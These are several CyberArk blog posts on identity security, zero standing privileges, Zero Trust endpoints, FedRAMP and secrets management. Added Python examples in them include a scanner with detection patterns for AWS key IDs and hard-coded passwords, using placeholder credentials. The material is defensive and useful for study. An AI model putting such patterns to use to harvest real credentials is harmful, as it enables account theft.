    The umbrella of developer identities includes any human engineers who write code. Developers will self-administer various cloud services, create cloud-native applications, push workloads into the cloud and access supporting resources.
  3. Application and Audit Team Identities
    Other application teams, aside from developers and any audit teams checking compliance, will require access to cloud environments. Though they will require lesser privileges, like read-only access to various services, read-only access can still pose a security threat to your organization.
  4. Machine Identity Workloads
    The cloud-native applications, services, automation tools and processes that run your business are considered machine identities – and they now outnumber human identities by a factor of 45:1. Some risks for machine identities include access keys coded into software and released to the public.

The ‘How’ of Cloud Identity Security

Now that we’ve discussed the what and where of building secure, well-architected cloud environments, tackling the how requires adhering to a couple of essential guiding principles:

  1. Zero Standing Privileges
    The dream scenario of access is to reduce its availability and impact, giving someone access to the one thing they need to do and nothing else. However, these logistics are often viewed as unrealistic in the highly complex world of cloud security, especially in keeping up with cloud innovation and required velocity. The principle of zero standing privileges (ZSP) is the best solution to these challenges. You can remove persistent privileges to limit implicit trust and provide several levels of control to verify access.
  2. Time, Entitlements and Approvals (TEA)
    Designing a better user experience while keeping security foundational can be a significant challenge, especially for roles that require velocity, like developers. The key to this balanced cloud strategy is TEA:

    • Time: For how long is access granted?
    • Entitlements: What level of access have you granted?
    • Approvals: What level of checks have you undertaken on access?

You can achieve ZSP by controlling the time of sessions, dynamically provisioning least privilege entitlements and ensuring proper approvals are in place. To dive deeper into implementing ZSP and increasing the adoption of security controls, check out this fireside chat with CIO Mentor and Advisor Simon Ratcliffe and CyberArk VP of Engineering Shay Saffer.
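To make the TEA model concrete, here is an added example (not CyberArk’s code) of a small just-in-time access broker that enforces ZSP: requested entitlements are checked against a per-role ceiling, approvals must come from someone other than the requester, and every grant carries an expiry, so an entitlement lookup after the session ends returns nothing. Role names, identities, entitlement strings and the fixed clock are all constructed for illustration.

```python
"""Added example, not CyberArk's code: a minimal just-in-time (JIT) access
broker applying the TEA model (Time, Entitlements, Approvals) to enforce zero
standing privileges (ZSP). Roles, identities and entitlements are constructed."""
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from typing import Optional

# Fixed "now" so the example is reproducible (constructed value).
T0 = datetime(2024, 5, 8, 12, 0, tzinfo=timezone.utc)


@dataclass(frozen=True)
class Policy:
    """What a role may ever be granted, for how long, and with whose sign-off."""
    allowed_entitlements: frozenset  # Entitlements: maximum scope for the role
    max_duration: timedelta          # Time: hard ceiling on one session
    approvals_required: int          # Approvals: distinct approvers needed


# Constructed policies: elevated scope gets a shorter ceiling and more approvals.
POLICIES = {
    "developer": Policy(frozenset({"s3:read", "lambda:deploy"}),
                        timedelta(hours=4), 0),
    "cloud-admin": Policy(frozenset({"iam:admin", "ec2:admin", "s3:admin"}),
                          timedelta(hours=1), 2),
}


@dataclass(frozen=True)
class AccessRequest:
    identity: str
    role: str
    entitlements: frozenset
    requested_duration: timedelta
    approvers: frozenset
    requested_at: datetime


@dataclass(frozen=True)
class Grant:
    identity: str
    entitlements: frozenset
    expires_at: datetime


class JitBroker:
    """Stores only time-bound grants; there is no standing privilege to store."""

    def __init__(self) -> None:
        self._grants: list[Grant] = []

    def evaluate(self, req: AccessRequest) -> tuple[bool, str, Optional[Grant]]:
        policy = POLICIES.get(req.role)
        if policy is None:
            return False, f"unknown role {req.role!r}", None
        # Entitlements: the request must stay inside the role's ceiling.
        excess = req.entitlements - policy.allowed_entitlements
        if excess:
            return False, f"entitlements outside policy: {sorted(excess)}", None
        # Approvals: a requester can never count as their own approver.
        approvers = req.approvers - {req.identity}
        if len(approvers) < policy.approvals_required:
            return False, (f"{policy.approvals_required} approval(s) required, "
                           f"{len(approvers)} valid"), None
        # Time: clamp the session to the ceiling instead of rejecting outright.
        if req.requested_duration <= timedelta(0):
            return False, "duration must be positive", None
        duration = min(req.requested_duration, policy.max_duration)
        grant = Grant(req.identity, req.entitlements, req.requested_at + duration)
        self._grants.append(grant)
        return True, f"granted for {duration}", grant

    def effective_entitlements(self, identity: str, at: datetime) -> frozenset:
        """ZSP check: only unexpired grants contribute; otherwise the set is empty."""
        active = set()
        for g in self._grants:
            if g.identity == identity and g.expires_at > at:
                active |= g.entitlements
        return frozenset(active)


if __name__ == "__main__":
    broker = JitBroker()
    # Developer asks for 8h of read access; the policy clamps it to 4h.
    print(broker.evaluate(AccessRequest("alice", "developer", frozenset({"s3:read"}),
                                        timedelta(hours=8), frozenset(), T0))[1])
    # Admin request with the requester listed as an approver: still one short.
    print(broker.evaluate(AccessRequest("bob", "cloud-admin", frozenset({"iam:admin"}),
                                        timedelta(minutes=30),
                                        frozenset({"bob", "carol"}), T0))[1])
    print(broker.effective_entitlements("alice", T0 + timedelta(hours=5)))  # frozenset()
```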

As threat actors continue to refine log-in attack methods during the escalating adoption of cloud technology, it becomes increasingly clear that relying solely on legacy security measures is no longer sufficient. Embracing a cloud-first mentality and prioritizing identity security in the cloud is the next step in fortifying defenses in this perimeter-less era.

Alyssa Miles is a product marketing manager at CyberArk.

Transforming Critical Infrastructure Security: The Power of Identity https://www.cyberark.com/blog/transforming-critical-infrastructure-security-the-power-of-identity/ Thu, 02 May 2024 19:45:59 +0000

In an era when every aspect of our society depends on reliable critical infrastructure, the role of identity security in safeguarding these essential services has never been more pivotal. With sophisticated cyberthreats escalating, understanding the transformational potential of identity security is akin to orchestrating a symphony. Each section – strings, woodwinds, brass and percussion – must perfectly harmonize to produce a masterpiece. Similarly, every identity and device in a network must function in secure sync to protect the critical infrastructure of our digital and physical worlds.

The Symphony of Security: Why Identity Matters Now

The future of strong cybersecurity strategies is intrinsically linked to the identity of each user and machine across your network. This insight is crucial at a time when critical infrastructure sectors such as energy, healthcare and finance face unprecedented risks. Identity security acts as the conductor, ensuring that every network element performs its role securely and effectively, safeguarding the services vital to our daily lives.


Identity Security: The Cornerstone of Resilience

Identity security is not just about protecting human and non-human identities – it’s about helping to ensure the continuity and resilience of services that society depends on. Focusing on identity can help transform the security landscape of critical infrastructure by:

  • Proactive Threat Detection. By harnessing the power of artificial intelligence, identity security solutions can predict and neutralize threats before they manifest, transitioning from a reactive to a proactive security posture.
  • Enhanced Compliance and Control. As regulations become stricter, identity security can help organizations stay ahead of the curve. Managing privileged credentials and monitoring access can help ensure that only the right entities have the right access at the right time, aligning with compliance needs.
  • Securing the Remote Frontier. As remote work and the increasing need for third-party vendors become the norm, securing identity extends beyond the physical office and remote employees. Comprehensive identity management ensures that secure remote access remains a gateway to productivity, not vulnerabilities.
  • Innovative Access Technologies. The shift toward passwordless authentication is helping to turn login into a seamless yet secure process, authenticating each user while reducing the reliance on credentials.

Harmonizing Security: The Zero Trust Model

In the grand symphony of identity security, adopting a Zero Trust framework is like tuning each instrument before a performance – ensuring every note plays only at the right moment and precisely as intended. Zero Trust operates on the principle that trust is never assumed for humans or machines. By implementing measures like just-in-time (JIT) access and zero standing privileges (ZSP), organizations orchestrate a dynamic and resilient security infrastructure. This approach ensures that every element within the network contributes harmoniously, maintaining the integrity and security of the entire ensemble.

Strengthening Partnerships and Sharing Intelligence

Just as a symphony grows through collaboration among its musicians, strengthening partnerships and enhancing information sharing across sectors – including agriculture, communications and transportation – play a critical role in orchestrating effective security measures. Identity security solutions should enable secure, confidential information sharing among third-party vendors and stakeholders, which is vital for developing timely, actionable intelligence.

Your Role in the Cybersecurity Symphony

As a cybersecurity professional, your role is to ensure that every “instrument” – every user and device within your network – plays its part perfectly. By integrating advanced identity security solutions, you contribute to a secure, resilient future for critical infrastructure, ensuring this vast symphony performs flawlessly for generations.

Learn how a global multi-energy provider protects privileged users and vendors with a comprehensive privileged identity security strategy.

Chris Maroun is a senior director in CyberArk’s field technology office, and Ryne Laster is a product marketing manager at CyberArk.

The Importance of Identity Security in Zero Trust Endpoint Defense https://www.cyberark.com/blog/the-importance-of-identity-security-in-zero-trust-endpoint-defense/ Tue, 30 Apr 2024 14:21:02 +0000

Identity security and Zero Trust have emerged as critical components in the defense against quickly evolving cyberthreats. Together, the solution and the approach support a default stance of “never trust, always verify,” with every risky action requiring authentication, authorization and audit. In the CyberArk 2023 Identity Security Threat Landscape Report, we found that 74% of organizations have begun the implementation of Zero Trust initiatives, with another 18% planning to do so in the next 12 to 24 months. If you’re reading this blog, you may be on a team driving these strategic initiatives and working with cybersecurity vendors to implement them. And if you haven’t yet considered extending identity security over your desktops and servers, it’s high time you do so. Read on for the why and how.

When working on strategic programs, some investments in cybersecurity, such as multi-factor authentication (MFA) and Single Sign-On (SSO), are widely recognized for reliably delivering relief to the defending teams – and, as such, are prioritized. Some are even explicitly called out as examples of required capabilities, such as MFA. Critically, though, in far too many Zero Trust implementations these programs remain no more than a set of siloed technologies, because each technology is viewed as belonging to a certain domain (for MFA, that would be the IAM domain) instead of from a broader angle.

The omissions are the most glaring when you look through a holistic identity-first approach lens, especially considering the first mile of user access and the last mile of information consumption – the endpoint. In fact, according to the Identity Security Threat Landscape Report, 79% of 2300 cybersecurity experts around the globe indicated that Identity Management is the most critical principle for successful Zero Trust initiatives, followed closely by endpoint security device trust (78%).

These stats imply that these capabilities are vastly different. But are they? Should we consider some capabilities of identity management and security as critical contributors to endpoint security?

I certainly think so.

Zero Trust in the Endpoint Department

If your day-to-day job lies in Identity and Access Management (IAM), you should be familiar with many paradigms that fit into and comprise Zero Trust. Those include least privilege, zero standing privilege (ZSP), just-in-time (JIT) access and privilege, continuous authentication and risk assessment. The same logic should apply to endpoints – both workstations and servers. Not for nothing, the principle of least privilege (PoLP) is designated as the cornerstone of Zero Trust. It is an ever-present recommendation of auditors and authorities in the cybersecurity field.

So, if your endpoint security strategy is built around capabilities that scrutinize applications, processes and actions and respond to those deemed malicious, your Zero Trust initiative should get some attention in the endpoint department. After all, isn’t Zero Trust fundamentally about proactive rather than reactive measures?

Now consider the simple diagram below. A very traditional endpoint security setup would include a combination of unified endpoint management (UEM) and endpoint detection and response (EDR). These technologies, while providing a near-complete coverage of an attack kill chain, are very asset or resource-centric, meaning they usually focus on specific files, folders and processes. What should have been there from the very start – the identity context – has been notably missing. Analysts and the industry recognize this and have now expanded detection and response to include protection from identity threats in the form of ITDR.

But what about identity-centric prevention?

Endpoint defense-in-depth graphic

Despite the widespread adoption of various security measures, their effectiveness is ultimately contingent upon their convergence at the endpoint. The endpoint is where identities interact with critical resources and identity security and Zero Trust approaches must converge to provide a comprehensive defense. In today’s environment, characterized by an abundance of new identities, hybrid environments and sophisticated AI-driven threats, security is a question of how seamless your identity security fabric is and how complete the coverage of your assets is.

The Case for Proactive, Identity-centric Endpoint Security

Perhaps surprisingly, if you shift your mentality from the comfortably numb, “It’s not a question of if, but when,” back to attack prevention – and do a good enough job of setting endpoint privilege fundamentals – it may just be the security formula you’re looking for.

If you are a tenured defender, you may be thinking, “We tried that. It didn’t work 20 years ago – why should it work today? There’s a reason we ended up in an EDR-centric endpoint security camp.” All true – we did try, heard back from users, and opted for business agility and moving fast. Around 10 years ago, ransomware changed the game, and, as a result, cybersecurity today is a topic at the board level, and businesses today have to proactively inform the shareholders about security measures they take to prevent cyber incidents. What is also different now is that we finally have the right tools for the job.

Endpoint identity security platform graphic

Identity – the new (and the last standing) security perimeter – must be woven into anything happening within our infrastructure. It should be continuous and reliable. As part of identity security, this job is performed by an endpoint identity security agent that provides the ability to discover and secure privileged accounts on the endpoints, secure user authentication mechanisms, provide passwordless and strong authentication injection points into user workflows, harden other security agents and browsers and play a critical identity bridging role to ensure a single point of authority over identities throughout the organization.

Couple this with common endpoint privilege management (EPM) that helps discover and remove local admin rights, provide automated and transparent elevation for applications and isolate risky applications from accessing certain resources, enforce role-specific least privilege, defend credentials and security tokens, and add additional ransomware protection – and you have an excellent foundational layer of defense.

Having completed this loop and extended the identity security over your workstations and servers, you’ve ensured that your endpoint security plays into your Zero Trust initiative. Getting this identity-centric prevention right will help your organization do four critical things:

  1. Extend identity security and Zero Trust to your workstations and servers
  2. Decrease the endpoint attack surface and prevent zero-day attacks
  3. Reduce IT security and operational costs with endpoint privilege controls
  4. Demonstrate compliance and meet audit requirements on the endpoint

Additionally, this layer of security can improve user productivity and experience for all employees.

In short, if you extend identity security over your desktops and servers, your users, administrators, SOC analysts and shareholders will appreciate it.

Andrey Pozhogin is a senior product marketing manager at CyberArk.

The Role of FedRAMP in Federal Agency Digital Transformation and Cybersecurity https://www.cyberark.com/blog/the-role-of-fedramp-in-federal-agency-digital-transformation-and-cybersecurity/ Thu, 25 Apr 2024 15:44:45 +0000 https://www.cyberark.com/?p=189990 FedRAMP Federal digital transformation cybersecurity

Not too long ago, when I was designing, building, operating and defending networks, the government organizations I worked with were burdened with many tasks related to deploying a new capability. We needed to decide and plan how it would be assessed and authorized, deployed, maintained, operated, patched, defended and, of course, when and how to upgrade the capability.

Assessment and authorization would take months, if not over a year, for a system or set of capabilities. Deploying and setting up complex on-premises software demanded extensive time and resources from our IT teams. Maintenance was continuous, requiring regular monitoring and troubleshooting to ensure smooth operation.

Patching was particularly critical and time-sensitive, as any delay in addressing vulnerabilities could lead to security breaches. Our IT staff had to be constantly alert, integrating updates while minimizing business interruption. Upgrading software often posed a significant challenge, as comprehensive testing was needed to avoid operational downtime.

Cybersecurity was another intense area of focus. Internal resources had to construct and maintain robust defense systems, with dedicated personnel to monitor and counteract threats promptly. Each application increased the potential attack surface, necessitating sophisticated and wide-ranging security expertise.

The Challenges of Deploying New Capabilities

The responsibilities of securing, maintaining and refreshing software were complex and costly, falling squarely on organizations’ internal teams – a demanding reality now alleviated by the software-as-a-service (SaaS) model.

Another factor in designing, operating and defending networks has been the evolution of cybersecurity toward the Zero Trust framework. The increasing complexity of cyberthreats has driven organizations to adopt a Zero Trust mindset, the rise of cloud and remote access technologies – and the recognition that traditional perimeter-based security is no longer sufficient.

Today, federal agencies have many competing requirements to meet beyond cybersecurity directives. We often talk about agencies needing to meet Executive Order (EO) 14028, issued in 2021 and centering around improving U.S. cybersecurity. The Biden administration has also tasked federal agencies with “Transforming Federal Customer Experience and Service Delivery to Rebuild Trust in Government” (EO 14058). The Office of Management and Budget (OMB) issued further guidance in 2023 with “Delivering a Digital-First Public Experience” (OMB M-23-22). In essence, agencies have two daunting goals in the digital transformation of their services while improving their cybersecurity.

One way to quickly achieve both requirements is to use software-as-a-service (SaaS) capabilities that have gone through the FedRAMP authorization process. Using the trusted FedRAMP process, agencies can rapidly procure and deploy solutions to meet their mission objectives.

Improving Cybersecurity Today Means Going on a Zero Trust Journey

Agencies have a lot on their plates, and for most of them, cybersecurity is not their core competency. Using solutions that have a FedRAMP authorization enables agencies to focus on their core competencies, delivering services to customers while conducting their digital transformation and maintaining cybersecurity. Adopting cloud-based solutions is an attractive business strategy, as organizations can streamline operations and reduce costs.

EO 14028 assigns agencies the responsibility to modernize their cybersecurity and advance toward a Zero Trust architecture. Zero Trust can be considered a foundational initiative that, together with an organized framework like the NIST Cybersecurity Framework, enables decision-makers and security leaders to achieve pragmatic and effective security implementations. Zero Trust efforts must incorporate, coordinate and integrate a challenging combination of policies, practices and technologies to succeed. As agencies begin consuming more capabilities from the cloud, the ability to use solutions that have already undergone the FedRAMP process will speed the transition.

Identity Security Capabilities Need the Highest Security

Identity security capabilities are foundational to protecting agency assets and identity is the target of many of the new attack methods we hear about from our customers and red team. I firmly believe that identity security capabilities should be a focus area of an organization’s overall security efforts. In today’s digital landscape, where cyberthreats constantly evolve and become more sophisticated, strong identity and access management controls are crucial for protecting sensitive data and systems. Identity security capabilities serve as the gateway to an organization’s resources. Identities, whether they belong to users, applications or devices, are the primary vectors through which access is granted or denied. Without robust identity security measures in place, an organization becomes vulnerable to unauthorized access, data breaches and other cyberthreats.

Agencies should use solutions authorized at the FedRAMP High-impact level, since the loss of confidentiality, integrity or availability would have severe repercussions on operations. The newly authorized identity and endpoint privilege management solutions from CyberArk are what many agencies can use to evolve their Zero Trust maturity and meet the control requirements for their IT environments.

Benefits of FedRAMP to Zero Trust – Maintaining Speed to Value

As agencies continue to deploy more pieces of their Zero Trust architecture, the union with a FedRAMP-authorized identity security solution is more than compatible – it’s strategic. It enables a robust, compliant, future-focused stance against cyberthreats, ensuring the journey is embarked upon and sustained with a vigilant and compliant guardian.

I recommend that agencies adopt FedRAMP-authorized identity security solutions and engage in continuous education and training for their personnel. Understanding that adversary and agency objectives are dynamic means ensuring your security solutions’ functionality matures in response and recognizing that your people are your best line of defense. Moreover, agencies should work closely with their solution providers to ensure mission objectives are effectively accomplished as a team. Collaboration is vital in cybersecurity – a partnership approach can significantly enhance the effectiveness of serving your customers and maturing your Zero Trust strategy.

The journey to Zero Trust is ongoing. With the right tools and mindset, government agencies can look forward to a more secure future. A FedRAMP-authorized identity security solution is more than a product – it’s a strategic ally in the mission to protect the nation’s digital frontiers.

James Imanian is senior director of the U.S. Federal Technology Office at CyberArk.

Defense-in-Depth for Secrets Management: Discovery, Visibility, Leak Detection and AI https://www.cyberark.com/blog/defense-in-depth-for-secrets-management-discovery-visibility-leak-detection-and-ai/ Tue, 23 Apr 2024 13:10:53 +0000 https://www.cyberark.com/?p=189939 Globe futuristic technology abstract background illustration

In the past, many security teams considered securing secrets enough – if your secrets were secured, you were good. While you’re still kind-of-good staying on this course, security professionals increasingly recognize that just securing secrets is not enough – organizations require a more sophisticated solution to help protect themselves in today’s increasingly sophisticated threat landscape.

For large organizations with vast application portfolios, safeguarding these secrets and the newly created secrets from agile dev teams is challenging. And the growing number of secrets can increase the cyber debt associated with unsecured applications if not addressed. Fortunately, with a defense-in-depth approach, AI and automation, security teams increasingly have opportunities to further address and improve the security of the organization’s machine identities and reduce cyber debt.

The High Cost of Unknown Secrets and Leaks

Security teams recognize that they can only secure the secrets and machine identities they know. The problem is that security is often unaware of all the secrets, especially with cloud workloads. And essentially, if you’re unaware of a secret, you’re probably not securing it.

Organizations also increasingly recognize that when secrets management best practices are not followed, there is an increased likelihood of secrets being leaked and exposed publicly.

And with all the ongoing breaches of human and machine identities, there’s increased awareness that the consequences of a secrets breach can be devastating for the enterprise. Organizations look to remediate the situation rapidly when a problem, such as an unsecured secret, is discovered or a leaked secret is detected.

Secrets and Vault Sprawl: A Growing Challenge

But why now? What’s changed that makes just vaulting secrets no longer enough? While cloud, digital transformation and DevOps adoption have driven incredible business benefits, they’ve also created many secrets and, too often, vault sprawl. Cloud service providers’ (CSPs) built-in secrets stores, such as AWS Secrets Manager (ASM) and Azure Key Vault (AKV), are becoming increasingly popular and widely used by development teams – they can be very effective tools. Dev teams can easily start using the built-in secrets stores, creating a store for each project or on an account or subscription basis. This is often encouraged by the CSP – Azure, for example, recommends using separate key vaults. The result is multiple secrets stores, running into potentially thousands of secrets stores in a large enterprise. In many organizations, the challenge for security teams is that the vaults can be created without their knowledge. So security teams, especially when less familiar with the cloud, are too often unaware of the secrets stores and the secrets in them.

The Challenge of Securing Secrets for Security Teams

So now developers and cloud teams are establishing new secrets stores and securing secrets in them, without security being aware that the secret stores even exist. Okay, but is that so bad? The secrets are at least vaulted in a secrets store. Still, while this can provide some level of security, this approach doesn’t scale and is unlikely to meet corporate compliance and security policies. Some critical problems with this approach are:

  1. Security teams are unaware of the secrets in the secret stores, the policies followed (or not followed), and how effectively they are being secured – e.g., what are the secrets used for? What does the secret provide access to? What are the security policies? Which apps are using these secrets?
  2. Multiple secrets stores create vault sprawl and secrets sprawl. Instead of the enterprise having a single copy of a secret that’s secured and managed in a single centralized vault, with vault sprawl, there are multiple copies of the same secret in numerous vaults and even across multiple cloud environments. If attackers can’t steal from one vault, they will just find another that’s less secure.
  3. Secrets rotation is typically not supported by the cloud providers’ built-in secrets stores. And with secrets sprawl, secrets rotation often becomes essentially impossible when multiple apps potentially use the same secrets in production environments. Unless the secrets are rotated in a coordinated manner, one or more production apps will go down because they are still using the old credentials.
  4. Meeting compliance and audit requirements is challenging without a centralized view of secrets. How will auditors be comfortable that applications and secrets are in compliance if the same secret is stored in multiple secrets stores, and with the uncertainty that there may be some secrets stores they are not even aware of?

So why doesn’t the corporate security team simply get developers to secure secrets in a central store? Well, let’s get real – security is rarely going to be able to change the developers’ workflows and behavior. So, how can security teams secure these secrets scattered across potentially thousands of secrets stores? Well, the good news is that there are solutions that can centrally secure secrets without forcing changes in the developers’ workflows.

Protecting Secrets: Are You Responsible for What You Don’t Know?

In many organizations, security is likely to be held responsible for secrets they may not even know exist. It’s not a great situation, so first, let’s figure out what secrets exist. Fortunately, security teams can increasingly get visibility and secure the secrets in these built-in secrets stores. Discovery tools are becoming increasingly important because they can give security visibility into all the secrets stores across the enterprise.

These discovery tools can also derive insights such as when the secret was last used, whether it is idle or unused – and when it was last rotated – if at all. They can also provide a mechanism to track the owner of the secrets stores and the secrets. Most importantly, security teams can now assess and prioritize which secrets and secrets stores they want to centrally manage in a vault and potentially even work with the cloud and development teams to ensure that best practices are followed.
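The insights listed above (duplicate copies of a secret across stores, rotation age, idle secrets, missing owners) can be computed from a plain inventory once it has been collected. The following is an added example, not CyberArk’s or any vendor’s code: it runs over a constructed inventory of secrets pulled from several cloud secrets stores (all store names, account IDs, owners, values and dates are placeholders) and produces the findings a discovery tool would surface to prioritise onboarding into a central vault. Secret values are hashed before comparison so duplicates can be matched without keeping plaintext around.

```python
"""Secrets-store discovery insights (added example; not CyberArk code).

Takes a constructed inventory of secrets collected from several cloud
secrets stores and flags what a discovery tool would surface: the same
credential copied into more than one store (secrets sprawl), secrets
outside the rotation window, idle secrets, and secrets with no owner.
Store names, values, owners and dates are all constructed.
"""
from __future__ import annotations

import hashlib
from dataclasses import dataclass
from datetime import date, timedelta


@dataclass(frozen=True)
class SecretRecord:
    store: str                   # secrets store the record came from
    name: str                    # secret name inside that store
    value: str                   # plaintext; only ever hashed below
    owner: str | None            # None if the store has no owner tag
    last_rotated: date | None    # None if never rotated
    last_accessed: date | None   # None if never read


def fingerprint(value: str) -> str:
    """Short SHA-256 prefix so copies can be matched without keeping plaintext."""
    return hashlib.sha256(value.encode()).hexdigest()[:16]


def locate(r: SecretRecord) -> str:
    return f"{r.store}/{r.name}"


def find_duplicates(records: list[SecretRecord]) -> dict[str, list[str]]:
    """Group records by value hash; groups of size > 1 are one secret living in several stores."""
    groups: dict[str, list[str]] = {}
    for r in records:
        groups.setdefault(fingerprint(r.value), []).append(locate(r))
    return {fp: locs for fp, locs in groups.items() if len(locs) > 1}


def find_stale(records: list[SecretRecord], today: date, max_age_days: int = 90) -> list[str]:
    """Never rotated, or rotated longer ago than the policy window."""
    cutoff = today - timedelta(days=max_age_days)
    return [locate(r) for r in records if r.last_rotated is None or r.last_rotated < cutoff]


def find_idle(records: list[SecretRecord], today: date, idle_days: int = 60) -> list[str]:
    """Never read, or not read within the idle window (candidates for removal)."""
    cutoff = today - timedelta(days=idle_days)
    return [locate(r) for r in records if r.last_accessed is None or r.last_accessed < cutoff]


def find_unowned(records: list[SecretRecord]) -> list[str]:
    """No owner recorded, so nobody to ask what the secret unlocks or who depends on it."""
    return [locate(r) for r in records if not r.owner]


def discovery_report(records: list[SecretRecord], today: date) -> dict:
    """One summary a security team can use to prioritise onboarding into a central vault."""
    return {
        "duplicates": find_duplicates(records),
        "stale_rotation": find_stale(records, today),
        "idle": find_idle(records, today),
        "unowned": find_unowned(records),
    }


# Constructed inventory: account IDs, vault names, values and dates are placeholders.
TODAY = date(2024, 4, 23)
INVENTORY = [
    SecretRecord("aws:111111111111/payments-prod", "db-password", "constructed-db-pw-7f3a",
                 "payments-team", date(2024, 3, 20), date(2024, 4, 22)),
    SecretRecord("aws:222222222222/payments-dev", "db-password", "constructed-db-pw-7f3a",
                 None, date(2023, 11, 1), date(2024, 4, 1)),
    SecretRecord("azure:kv-analytics", "storage-key", "constructed-storage-key-91c0",
                 "data-team", None, None),
    SecretRecord("azure:kv-marketing", "smtp-password", "constructed-smtp-pw-2b6e",
                 "marketing", date(2024, 2, 15), date(2024, 1, 10)),
]

if __name__ == "__main__":
    for section, items in discovery_report(INVENTORY, TODAY).items():
        print(section, items)
```

The duplicate group is the case the post calls out as the hardest to remediate: the same database password in a production and a development store means rotation has to be coordinated across both, or one of the applications using it goes down. The rotation and idle windows (90 and 60 days) are assumptions to be replaced by the organization’s own policy.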

Automating Onboarding Secrets: The Ideal Solution

Of course, in an ideal coding environment, there would be no unmanaged secrets to discover. For example, as soon as the developer uses their AI-assisted IDE (integrated development environment) to write the code that requires a secret, simply having the secret request in the code would ensure that the secret is centrally secured or a policy established for securing the secret automatically at run time. Effectively, this approach shifts left and creates the secret within the infrastructure as code so that the newly created secret is automatically onboarded and centrally secured when the infrastructure is spun up.

Unfortunately, in most situations today, this is not the case and secrets are not automatically onboarded to a central secrets store managed by the application security team. Instead, too often, they are unsecured (e.g., hard-coded) or dropped into one of the CSP’s built-in secrets stores – a store that security is potentially unaware of. So, in this case, the security team will need first to discover the secrets and then, once found, centrally secure them.

AI Tools: Offering Insights and Promising More

Once you can discover secrets across all the various secrets stores, AI tools coupled with discovery, other secrets tools and automation promise to detect anomalies, force rotations and prioritize which secrets need to be onboarded, providing another layer of defense. Today, we’re still in the early stages of determining the most effective use cases for AI to improve the security of machine identities and their associated secrets, and it’s a fast-moving area.

Leak Detection: Preventing Incidents When Best Practices Aren’t Followed

Of course, development and cloud teams do not always follow best secrets management and coding practices. We’re all human, and too often, there’s the potential for human error, workarounds and quick fixes that can expose secrets that should have been secured across public code repositories.

Consider a developer prototyping an automation script or app for a quick demo that needs some credentials – it’s just too easy to hard-code the secret. Attackers don’t care if it’s a simple script or a complex app – they just want to steal that database credential or cloud access key. Of course, once the secret is rotated, the hard-coded secret is useless, but until it’s rotated, it’s something an attacker can exploit. In another scenario, the hard-coded secret has been removed and vaulted.

So, is it all good?

Well, no, not until it’s rotated.

What happens when the code with a hard-coded secret is posted to a public Git repository?

It’s exposed.

Yes, these edge cases shouldn’t happen; the problem is that they occur. Over 10 million secrets and credentials were detected in Git repositories in 2022, according to GitGuardian.

These are examples of secrets you thought you’d safely secured but were leaked by human error. An added layer of defense is to secure secrets in a central vault and continually check that none of these secrets have been inadvertently leaked because of human error. Of course, once a leaked secret is detected, it needs to be rotated so that any existing copies are invalidated.
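The two checks described in this section, flagging candidate secrets committed in code and confirming whether a candidate is a copy of a secret already held in the central vault, can be combined in one scan. The following is an added example, not CyberArk’s code: it runs over a constructed Python source file (the AWS-style key ID and the passwords in it are placeholders, not real credentials) and reports each suspicious line with a severity. A candidate whose hash matches a vault fingerprint is a confirmed leak of a known secret; a match on a public key-ID shape or a high-entropy literal is a likely secret; a low-entropy literal is left for human review. The entropy threshold and the variable-name list are assumptions to tune per codebase, and the scan deliberately never emits the matched value itself.

```python
"""Hard-coded secret detection over source text (added example; not CyberArk code).

Flags candidate secrets in code and checks candidates against hashes of
secrets held in the central vault, so a known secret that was copied into
a repository is reported as a confirmed leak. Sample source, vault
fingerprints and thresholds are constructed for the demonstration.
"""
from __future__ import annotations

import hashlib
import math
import re

# Publicly documented shape of an AWS access key ID; other providers' shapes would be added here.
KEY_PATTERNS = {
    "aws-access-key-id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
}
# A quoted literal of 8+ characters assigned to a suspiciously named variable.
ASSIGNMENT = re.compile(
    r"(?i)(password|passwd|secret|api[_-]?key|access[_-]?key[_-]?id|token)\w*\s*[=:]\s*[\"']([^\"']{8,})[\"']"
)
ENTROPY_THRESHOLD = 3.0  # bits per character; assumption, tune per codebase


def shannon_entropy(s: str) -> float:
    """Average information per character; random-looking strings score higher."""
    counts = {c: s.count(c) for c in set(s)}
    return -sum((n / len(s)) * math.log2(n / len(s)) for n in counts.values())


def fingerprint(value: str) -> str:
    return hashlib.sha256(value.encode()).hexdigest()


def scan(source: str, vault_fingerprints: set[str]) -> list[dict]:
    """Return one finding per suspicious line; values are never included in the output."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        candidate = None
        for kind, pattern in KEY_PATTERNS.items():
            m = pattern.search(line)
            if m:
                candidate = (kind, m.group(0))
                break
        if candidate is None:
            m = ASSIGNMENT.search(line)
            if m:
                candidate = ("assignment", m.group(2))
        if candidate is None:
            continue  # e.g. a secret read from the environment, not a literal
        kind, value = candidate
        if fingerprint(value) in vault_fingerprints:
            severity = "confirmed-leak"      # a copy of a secret the vault manages
        elif kind != "assignment" or shannon_entropy(value) >= ENTROPY_THRESHOLD:
            severity = "likely-secret"       # key-shaped or random-looking literal
        else:
            severity = "review"              # low-entropy literal, possibly a placeholder
        findings.append({"line": lineno, "kind": kind, "severity": severity})
    return findings


# Constructed sample source. The key ID and passwords are placeholders, not real credentials.
SAMPLE_SOURCE = """\
import boto3
AWS_ACCESS_KEY_ID = "AKIAEXAMPLEEXAMPLE01"
DB_PASSWORD = "pr0d-Db-P@ssw0rd-2024"
password = os.environ["DB_PASSWORD"]
API_KEY = "changeme"
client = boto3.client("s3", region_name="us-east-1")
"""

# In practice the vault exports hashes; the plaintext appears here only to build the demo set.
VAULT_FINGERPRINTS = {fingerprint("pr0d-Db-P@ssw0rd-2024")}


def demo() -> list[dict]:
    return scan(SAMPLE_SOURCE, VAULT_FINGERPRINTS)


if __name__ == "__main__":
    for f in demo():
        print(f"line {f['line']}: {f['severity']} ({f['kind']})")
```

Line 4 of the sample, which reads the password from the environment, produces no finding, which is the behaviour the post recommends. Once a confirmed leak is reported, the response is the one the text gives: rotate the secret so every existing copy is invalidated.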

Automated Remediation: Reducing Cyber Debt

Another challenge for security teams is the vast number of applications, secrets stores and cloud use cases. There are many secrets and machine identities, and more are being added constantly. Unsecured applications are often referred to as cyber debt, and reducing cyber debt is becoming an increasing challenge for security teams, forcing them to at least keep pace with development teams to prevent it from growing further.

Cyber debt and the desire for multiple layers of defense make for an increasingly compelling need to not only detect problems such as unsecured secrets in the cloud providers’ secrets stores or leaked secrets but also to provide automated tools for remediating these challenges. Without a doubt, AI tools are going to help security teams detect potential issues and anomalies, and this will, of course, make automated remediation of anomalies even more critical.
